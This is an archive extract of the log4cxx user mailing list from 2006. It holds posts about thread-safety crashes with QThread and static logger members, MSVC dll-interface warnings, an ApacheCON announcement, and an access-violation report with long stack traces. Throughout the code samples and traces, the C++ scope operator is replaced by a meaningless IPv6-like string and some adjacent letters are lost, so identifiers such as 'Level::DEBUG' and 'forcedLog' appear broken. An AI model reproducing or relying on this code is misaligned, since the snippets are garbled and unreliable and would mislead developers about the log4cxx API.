(Windows/20050317) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Thread safety problem Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hello, I m using QThread and Log4cxx in a project. I created a simple class with static member to access logging anywhere in my soft. But when I m accessing from another thread I have some kind of random crash. I tested without multithread and it work fine. It s written in Log4cxx Faq that it s Thread safe. Am I wrong to use class static members or is there a bug in the thread safe functionnality? Is it problem to use QT Qthread with log4cxx? Thank you for any kind help. Best regards. here the class declaration, initialization, and log sample. //my class class Log{ public : static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream stream; static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggerPtr logger; }; //initialization log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggerPtr Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogger(log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetLogger("Logger")); log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream(Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogger, log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG); //logging sample Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream<<"message"<<LOG4CXX_ENDMSG; From [email protected] Thu Sep 14 09:29:32 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36460 invoked from network); 14 Sep 2006 09:29:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Sep 2006 09:29:31 -0000 Received: (qmail 19938 invoked by uid 500); 14 Sep 2006 09:29:27 -0000 Delivered-To: [email protected] Received: (qmail 19845 invoked by uid 500); 14 Sep 2006 09:29:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 19803 invoked by uid 99); 14 Sep 2006 09:29:26 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Sep 2006 02:29:26 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cedar.ugent.be) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Sep 2006 02:29:17 -0700 Received: from localhost (gorilla.ugent.be [161.129.204.104]) by cedar.ugent.be (Postfix) with ESMTP id 6B8552A4171 for <[email protected]>; Thu, 14 Sep 2006 11:28:50 +0200 (CEST) Received: from cedar.ugent.be ([161.129.204.104]) by localhost (gorilla.UGent.be [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id 15427-04 for <[email protected]>; Thu, 14 Sep 2006 11:28:45 +0200 (CEST) Received: from tnisoft.com (tni20.elis.UGent.be [161.129.204.104]) by cedar.ugent.be (Postfix) with ESMTP id 539FD2A4158 for <[email protected]>; Thu, 14 Sep 2006 11:28:45 +0200 (CEST) Subject: RE: Dll-interface warnings Date: Thu, 14 Sep 2006 11:28:44 +0200 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable In-Reply-To: <[email protected]> X-MS-Has-Attach: Content-class: urn:content-classes:message X-MS-TNEF-Correlator: X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Thread-Topic: Dll-interface warnings thread-index: AcbX2g7a4C8Y7kqLSKeZ4Se0NPqUggABdOxg From: "Merijn Vandenabeele" <[email protected]> To: "Log4CXX User" <[email protected]> X-Virus-Scanned: by UGent DICT X-Spam-Level: X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, hits=-5.206 tagged_above=-999 required=6.31 tests=ALL_TRUSTED, AWL, BAYES_00 X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N > -----Oorspronkelijk bericht----- > Van: Merijn Vandenabeele [mailto:[email protected]]=20 > Verzonden: donderdag 14 september 2006 10:45 > Aan: [email protected] > Onderwerp: Dll-interface warnings >=20 > Hi, >=20 > Because version 0.9.7 of log4cxx isn't recommended, I'm=20 > building the CVS Head following the instructions that came=20 > with the source. Building the libs runs smooths (VS2003), but=20 > when I use the libs in my project, I get a lot of=20 > dll-interface warnings when compiling. I didn't get these=20 > with version 0.9.7 so I guess I'm overlooking something? I=20 > searched the mailing list archives but found close to nothing=20 > on this subject. >=20 > Can somebody help me out or should I just ignore the warnings? >=20 > Thanks in advance, > Merijn >=20 Digging into the source, I guess config_msvc.h.in has something to do with these warnings. #if defined(WIN32) || defined(_WIN32) #pragma warning(disable : 4250 4251 4786 4290) #endif However, it's not clear to me what I should do with this file. I found no references to it in any other log4cxx files. Any hints? Thanks in advance, Merijn From [email protected] Thu Sep 14 17:49:21 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44227 invoked from network); 14 Sep 2006 17:49:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Sep 2006 17:49:21 -0000 Received: (qmail 96137 invoked by uid 500); 14 Sep 2006 17:49:12 -0000 Delivered-To: [email protected] Received: (qmail 95110 invoked by uid 500); 14 Sep 2006 17:49:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 95011 invoked by uid 99); 14 Sep 2006 17:49:08 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp103.sbc.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 14 Sep 2006 10:49:07 -0700 Received: (qmail 61214 invoked from network); 14 Sep 2006 17:47:46 -0000 Received: from unknown (HELO ?161.129.204.104?) ([email protected]@161.129.204.104 with plain) by smtp103.sbc.mail.mud.yahoo.com with SMTP; 14 Sep 2006 17:47:45 -0000 Mime-Version: 1.0 (Apple Message framework v752.2) Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Cc: Log4J Developers List <[email protected]>, Log4CXX Dev <[email protected]>, Log4J Users List <[email protected]>, Log4CXX User <[email protected]> Content-Transfer-Encoding: 7bit From: Curt Arnold <[email protected]> Subject: ApacheCON US 2006 Date: Thu, 14 Sep 2006 12:47:42 -0500 To: Logging General <[email protected]> X-Mailer: Apple Mail (2.752.2) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ApacheCON US 2006 (http://www.apachecon.com) will be held on October 9-13 in Austin, TX. Registration prices increase yet again tomorrow and hotel reservations should be made soon to take advantage of the special conference room rates. I've tentatively scheduled a Logging Services BOF for Thursday night (http://wiki.apache.org/apachecon/ BirdsOfaFeatherUs06) and plan to be at the Hackathon on Monday and Tuesday. If you have specific topics that you'd like to discuss at ApacheCON or other suggestions, please post them on [email protected]. Hope to see some of you there. From [email protected] Fri Sep 15 08:30:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93852 invoked from network); 15 Sep 2006 08:30:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Sep 2006 08:30:52 -0000 Received: (qmail 1183 invoked by uid 500); 15 Sep 2006 08:30:52 -0000 Delivered-To: [email protected] Received: (qmail 1045 invoked by uid 500); 15 Sep 2006 08:30:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 1034 invoked by uid 99); 15 Sep 2006 08:30:51 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 15 Sep 2006 01:30:51 -0700 X-ASF-Spam-Status: No, hits=1.8 required=10.0 tests=DATE_IN_PAST_48_96,RCVD_NUMERIC_HELO,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ciao.gmane.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 15 Sep 2006 01:30:39 -0700 Received: from root by ciao.gmane.org with local (Exim 4.43) id 1GO95G-0007Xk-Ij for [email protected]; Fri, 15 Sep 2006 10:30:06 +0200 Received: from 161.129.204.104 ([161.129.204.104]) by main.gmane.org with esmtp (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for <[email protected]>; Fri, 15 Sep 2006 10:30:02 +0200 Received: from dremartins by 161.129.204.104 with local (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for <[email protected]>; Fri, 15 Sep 2006 10:30:02 +0200 X-Injected-Via-Gmane: http://gmane.org/ To: [email protected] From: =?utf-8?b?QW5kcsOp?= Martins <[email protected]> Subject: Pattern converters (or FileAppender) not thread safe? Date: Tue, 12 Sep 2006 12:32:43 +0000 (UTC) Lines: 122 Message-ID: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Complaints-To: [email protected] X-Gmane-NNTP-Posting-Host: main.gmane.org User-Agent: Loom/3.14 (http://gmane.org/) X-Loom-IP: 161.129.204.104 (Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:161.129.204.104) Gecko/20060728 Firefox/161.129.204.104) Sender: news <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I'm currently using several loggers in an multi-threaded application. I overloaded the Logger class and some of it's methods, but not callAppenders, and i'm using and extended FileAppender and a simple ConsoleAppender. I keep getting an Access Violation Exception in DatePatternConverter. When it happens i have 2 FileAppenders (for different loggers and files) in the same Converter. My SLoggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8borcedLog just tests some more conditions than the original forcedLog and my SFileAppenderacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsubAppend just removes some forbidden chars from the log message: void SFileAppenderacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsubAppend(const LoggingEventPtr& event, Pool& p) { LogString theMessage = event->getMessage(); for (LogStringacf:4db6:5e0b:f386:43a5:35d7:718d:3c8biterator it = theMessage.begin(); it != theMessage.end(); it++) { if (forbiddenChars.find((*it))!=LogStringacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnpos) (*it) = ' '; } FileAppenderacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsubAppend(new SpotsLoggingEvent(event->getLogger(), event->getLevel(), theMessage, event->getLocationInformation()),p); } Oh, and i'm using STL_port >From the stack: Thread1: LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTranscoderacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncode(class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<char,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<char>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<char> > const &,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<unsigned short,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<unsigned short>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<unsigned short> > &) + 257 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bStringHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btoString(int,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<unsigned short,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<unsigned short>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<unsigned short> > &) + 133 bytes LOG4CXX! NumericTokenacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bormat(class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<unsigned short,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<unsigned short>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<unsigned short> > &,struct apr_time_exp_t const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 90 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSimpleDateFormatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bormat(class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<char,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<char>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<char> > &,__int64,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 202 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpatternacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhedDateFormatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bormat(class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<char,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<char>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<char> > &,__int64,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 450 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpatternacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btePatternConverteracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bormat(class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<char,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<char>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<char> > &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 75 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPatternLayoutacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bormat(class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<char,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<char>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<char> > &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 151 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bWriterAppenderacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsubAppend(class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 117 bytes log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSFileAppenderacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsubAppend(const log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> & {...}, log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool & {...}) line 202 + 202 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bWriterAppenderacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bppend(class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 67 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bppenderSkeletonacf:4db6:5e0b:f386:43a5:35d7:718d:3c8boAppend(class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 638 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bppenderAttachableImplacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bppendLoopOnAppenders(class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 104 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllAppenders(const log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> & {...}, log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool & {...}) line 99 + 27 bytes log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSLoggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8borcedLog(const log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevel> & {...}, const _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<char,_STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<char>,_STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<char> > & {...}, const int 500106, const log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLocationInfo & {...}, unsigned char 1) line 153 + 32 bytes Thread2: STLPORT_VC6_UNICODE.4.5! 01003660() LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bStringHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btoString(int,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<unsigned short,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<unsigned short>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<unsigned short> > &) + 133 bytes LOG4CXX! NumericTokenacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bormat(class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<unsigned short,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<unsigned short>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<unsigned short> > &,struct apr_time_exp_t const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 90 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSimpleDateFormatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bormat(class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<char,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<char>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<char> > &,__int64,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 202 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpatternacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhedDateFormatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bormat(class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<char,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<char>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<char> > &,__int64,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 450 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpatternacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btePatternConverteracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bormat(class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<char,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<char>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<char> > &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 75 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPatternLayoutacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bormat(class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsic_string<char,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhar_traits<char>,class _STLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllocator<char> > &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 151 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bWriterAppenderacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsubAppend(class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 117 bytes log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSFileAppenderacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bsubAppend(const log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> & {...}, log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool & {...}) line 202 + 202 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bWriterAppenderacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bppend(class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 67 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bppenderSkeletonacf:4db6:5e0b:f386:43a5:35d7:718d:3c8boAppend(class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 638 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bppenderAttachableImplacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bppendLoopOnAppenders(class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> const &,class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool &) + 104 bytes LOG4CXX! log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllAppenders(const 